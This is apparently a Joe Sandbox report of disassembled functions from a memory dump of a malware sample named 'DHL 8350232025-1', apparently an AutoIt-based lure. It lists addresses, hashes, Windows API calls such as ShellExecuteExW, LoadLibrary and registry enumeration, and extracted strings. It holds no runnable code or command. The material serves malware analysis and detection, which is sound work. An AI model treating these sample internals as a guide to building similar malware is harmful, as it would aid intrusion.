Opcode ID: fe7fa4505321e66624577cbed71748807bfbe03a42516720f05fbc4dda444fa4
Instruction ID: 46c3304aa76c388944dc344d2a9926a52b29036dafcf6124238a3e04c6410ac3
Opcode Fuzzy Hash: fe7fa4505321e66624577cbed71748807bfbe03a42516720f05fbc4dda444fa4
Instruction Fuzzy Hash: F7E0E536004101BBDB016FA1FD0C90ABF39FF49B22B208220F229A1070CB329430EF50

Function 001ABBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001ABEB3

Strings

D%'D%', xrefs: 001ABCA5
D%', xrefs: 001ABCA2
D%', xrefs: 001ABE9A
D%', xrefs: 001ABDED, 001ABD91, 001ABD1B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%'$D%'$D%'$D%'D%'
API String ID: 1385522511-1173686633
Opcode ID: 5873473402c31aeb7702e7d7f91a8e0da609477ec8357373551017eb9294ea72
Instruction ID: 97163c1f268626a7012b55d8bdc16fb6201f81f15e969c6e63c1ee79db5235b4
Opcode Fuzzy Hash: 5873473402c31aeb7702e7d7f91a8e0da609477ec8357373551017eb9294ea72
Instruction Fuzzy Hash: 05914A79A0424ACFCB18CF98C0D0AA9B7F1FF5A314B64816DD945AB356D731E981CB90

Function 0020C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A7620: _wcslen.LIBCMT ref: 001A7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0020C6EE
_wcslen.LIBCMT ref: 0020C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0020C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0020C7CA

Strings

0, xrefs: 0020C6AF

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 1c18da412c947c75a6e37d9b3c070eea966f49e2a8cbd7c71a82d8bbfea1381b
Instruction ID: 111e5b4c01fc035d94f5c5492c97c8fe0c4c31994d37f2398a6c9f6fc4ea57b4
Opcode Fuzzy Hash: 1c18da412c947c75a6e37d9b3c070eea966f49e2a8cbd7c71a82d8bbfea1381b
Instruction Fuzzy Hash: EE51D5B16243029BD7159F28C885B6BB7ECAF95310F24072DF595D31E2D770D924CB52

Function 0022AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0022AEA3

Part of subcall function 001A7620: _wcslen.LIBCMT ref: 001A7625

GetProcessId.KERNEL32(00000000), ref: 0022AF38
CloseHandle.KERNEL32(00000000), ref: 0022AF67

Strings

<, xrefs: 0022AE6B
@, xrefs: 0022AE72

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 8de7e9d1a3fc734b776610954f200dba9a1b082a0c4bb7b0078ee57c1e20103d
Instruction ID: b01eeed7aedbd12f89e509c61e81fd7c4d9544cb96a52e4bebfda7b708510eb8
Opcode Fuzzy Hash: 8de7e9d1a3fc734b776610954f200dba9a1b082a0c4bb7b0078ee57c1e20103d
Instruction Fuzzy Hash: B571B075A00625DFCB14EF94E484A9EBBF0FF09300F058499E816AB792CB75EE45CB91

Function 0020719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00207206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0020723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0020724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002072CF

Strings

DllGetClassObject, xrefs: 00207242

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: fa2085cc18e5ca3a493207d2965a7b155e6e3b5c4914c468e8f82b96128d454b
Instruction ID: cff7d5e6327d6da0aeb2731db8667e892ef32faaea29d6bde0d6bca17bc418b3
Opcode Fuzzy Hash: fa2085cc18e5ca3a493207d2965a7b155e6e3b5c4914c468e8f82b96128d454b
Instruction Fuzzy Hash: 7C4181B1A14304EFDB15CF54C884A9A7BB9EF44310F2580A9BD059F28BD7B0ED54DBA0

Function 00233D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00233E35
IsMenu.USER32(?), ref: 00233E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00233E92
DrawMenuBar.USER32 ref: 00233EA5

Strings

0, xrefs: 00233D89

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 8e080cf60d6982e14e82c956560886ed58da997053d82f802be50594ca218c77
Instruction ID: 1f94b4d698b3bc53b4b7834ed82923971736c9dc933fe77c824def3ba3dcfa0d
Opcode Fuzzy Hash: 8e080cf60d6982e14e82c956560886ed58da997053d82f802be50594ca218c77
Instruction Fuzzy Hash: F44148B5A2020AEFDB10DF54E884EEABBB9FF49350F144129E905A7250D730EE65CF60

Function 00201DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 00203CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00203CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00201E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00201E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00201EA9

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

Strings

ListBox, xrefs: 00201E25
ComboBox, xrefs: 00201DF0

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: b46342fe0221a52d1f6158628701b9309df1cc5d22cfce07bfa1de66fb4195d7
Instruction ID: efafd1da5545951ff6719dfa60fe32d3f3f6f9e32e344211e1e26c7943a7205a
Opcode Fuzzy Hash: b46342fe0221a52d1f6158628701b9309df1cc5d22cfce07bfa1de66fb4195d7
Instruction Fuzzy Hash: DB213575A10204BBDB18AF60DC46CFFB7B8EF56360B144119F821A71E2DB34496A8A20

Function 00232F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00232F8D
LoadLibraryW.KERNEL32(?), ref: 00232F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00232FA9
DestroyWindow.USER32(?), ref: 00232FB1

Strings

SysAnimate32, xrefs: 00232F68

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 0974d27eb9b6fb743b83c9005612271c5189f90724939bc08f701c8ddcc96ba9
Instruction ID: c939a3de12da1e1c8baa35ff0fdd55c3d2671c07f31e2166105443c0f9894322
Opcode Fuzzy Hash: 0974d27eb9b6fb743b83c9005612271c5189f90724939bc08f701c8ddcc96ba9
Instruction Fuzzy Hash: 3F21CDB2224206EBEB104F64EC85EBB77BDEF59364F100218FA50E2590D771DCA59B60

Function 001C4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001C4D1E,001D28E9,?,001C4CBE,001D28E9,002688B8,0000000C,001C4E15,001D28E9,00000002), ref: 001C4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001C4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,001C4D1E,001D28E9,?,001C4CBE,001D28E9,002688B8,0000000C,001C4E15,001D28E9,00000002,00000000), ref: 001C4DC3

Strings

mscoree.dll, xrefs: 001C4D86
CorExitProcess, xrefs: 001C4D98

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b34d5455fda882498f38e166d4ad8841efe6d31c8f18cc0ed650bfd19ec3cd82
Instruction ID: 36a9b1f7debd209ec17133ef2d55f01dd6b130ffccd830ee87bafaff88280850
Opcode Fuzzy Hash: b34d5455fda882498f38e166d4ad8841efe6d31c8f18cc0ed650bfd19ec3cd82
Instruction Fuzzy Hash: ABF04F35A40208BBDB15AF90EC4DFADBBB5EF54751F1001A8F90AA2660CB709A90DB91

Function 001FD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 001FD3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 001FD3BF
FreeLibrary.KERNEL32(00000000), ref: 001FD3E5

Strings

X64, xrefs: 001FD2A8
GetSystemWow64DirectoryW, xrefs: 001FD3B9

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: e410f3cbb13f08b82f6f89e6918dababf504ccf84e296ce56ef1e2fac03030f1
Instruction ID: 68b4eb46fd10523502a08296cb3758d6fad8d25ead091a751c09daaa43c0e964
Opcode Fuzzy Hash: e410f3cbb13f08b82f6f89e6918dababf504ccf84e296ce56ef1e2fac03030f1
Instruction Fuzzy Hash: 68F055B2805A289BE7385710FC489793325BF11B01B668098F74BF2018DB30CC40A7C3

Function 001A4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001A4EDD,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001A4EAE
FreeLibrary.KERNEL32(00000000,?,?,001A4EDD,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 001A4EA8
kernel32.dll, xrefs: 001A4E94

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: d74874ad28d0c8c808665a8c3f7b89d7e5166e8684256286c0628f09a1c0993d
Instruction ID: e0f266b68924e02f1f4ec489d4be78b4a62e46cc983e1cb6106e9ffd69f2d86d
Opcode Fuzzy Hash: d74874ad28d0c8c808665a8c3f7b89d7e5166e8684256286c0628f09a1c0993d
Instruction Fuzzy Hash: 9BE0863AA015225BD22117257C1CA6BA564AFC3F62B150115FC05F2100DBA4CD0152F4

Function 001A4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E3CDE,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001A4E74
FreeLibrary.KERNEL32(00000000,?,?,001E3CDE,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4E87

Strings

kernel32.dll, xrefs: 001A4E5B
Wow64RevertWow64FsRedirection, xrefs: 001A4E6E

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 8dbc6ab1ef3f2daa0d4fdb7ee33798887d5b46916ab607da864098fece0b433c
Instruction ID: d3d62adc163a4294e40b25a3988d905d24b205a209d7271d200f25987ebc2dc7
Opcode Fuzzy Hash: 8dbc6ab1ef3f2daa0d4fdb7ee33798887d5b46916ab607da864098fece0b433c
Instruction Fuzzy Hash: 24D0C23A50262157A6231B247C0CD8B6A28AFC7F113150111B809F2110CFA4CD0192E0

Function 00212947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00212C05
DeleteFileW.KERNEL32(?), ref: 00212C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00212C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00212CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00212CC0

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 62d763c01d8a74cc99c1fa4db583181fe72eec11bce4926b44801d902aa2982c
Instruction ID: a265dcb9f738436db63ae954700cf569156ea0900b379f2a986543d1a340e40d
Opcode Fuzzy Hash: 62d763c01d8a74cc99c1fa4db583181fe72eec11bce4926b44801d902aa2982c
Instruction Fuzzy Hash: CDB16171D10119ABDF21DFA4CD85EDEB7BDEF29350F1040A6F609E6141EB309A988FA1

Function 0022A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0022A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0022A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0022A468
CloseHandle.KERNEL32(?), ref: 0022A63D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 19fabf232f018c8317870d42f318b1d266afa6a74a32d09d1282bc75612c3886
Instruction ID: 560b074a98ba624fb04ef1852c2746067ad3b6e9eb2a2049d416e7874b91aeb3
Opcode Fuzzy Hash: 19fabf232f018c8317870d42f318b1d266afa6a74a32d09d1282bc75612c3886
Instruction Fuzzy Hash: 87A1C075604301AFD720EF28D886F2AB7E5AF98714F14885CF55A9B6D2D7B0EC41CB82

Function 001DBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00243700), ref: 001DBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0027121C,000000FF,00000000,0000003F,00000000,?,?), ref: 001DBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00271270,000000FF,?,0000003F,00000000,?), ref: 001DBC36
_free.LIBCMT ref: 001DBB7F

Part of subcall function 001D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000), ref: 001D29DE
Part of subcall function 001D29C8: GetLastError.KERNEL32(00000000,?,001DD7D1,00000000,00000000,00000000,00000000,?,001DD7F8,00000000,00000007,00000000,?,001DDBF5,00000000,00000000), ref: 001D29F0

_free.LIBCMT ref: 001DBD4B

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 33c4500afdec1f82f72dc0a034ada2cc2c0d4dd6118e54871eaab153de7785c7
Instruction ID: 61b7d673a8922ceb799dce5e0ca12a8298917b0cb67909818c770b92667c422e
Opcode Fuzzy Hash: 33c4500afdec1f82f72dc0a034ada2cc2c0d4dd6118e54871eaab153de7785c7
Instruction Fuzzy Hash: BB513771908219EFCB14EF69DCC59AEB7B8FF50310B12426BE456E73A1EB309E509B50

Function 0020E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0020DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0020CF22,?), ref: 0020DDFD

Part of subcall function 0020DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0020CF22,?), ref: 0020DE16

Part of subcall function 0020E199: GetFileAttributesW.KERNEL32(?,0020CF95), ref: 0020E19A

lstrcmpiW.KERNEL32(?,?), ref: 0020E473
MoveFileW.KERNEL32(?,?), ref: 0020E4AC
_wcslen.LIBCMT ref: 0020E5EB
_wcslen.LIBCMT ref: 0020E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0020E650

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: c233bd4772367576f5198edb77e1a28f575e56e36add272c9d8bed1a7ada1f36
Instruction ID: e42a43c889cc15606dbede5d34d3af5be536725d3607e202708f7af4b5edd668
Opcode Fuzzy Hash: c233bd4772367576f5198edb77e1a28f575e56e36add272c9d8bed1a7ada1f36
Instruction Fuzzy Hash: 025172B24183455BCB24EB90DC819DBB3ECAF95340F00491EF68993192EF75E6988B66

Function 0022B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001A9CB3: _wcslen.LIBCMT ref: 001A9CBD

Part of subcall function 0022C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0022B6AE,?,?), ref: 0022C9B5
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022C9F1
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022CA68
Part of subcall function 0022C998: _wcslen.LIBCMT ref: 0022CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0022BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0022BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0022BB63
RegCloseKey.ADVAPI32(?,?), ref: 0022BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0022BBB3

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
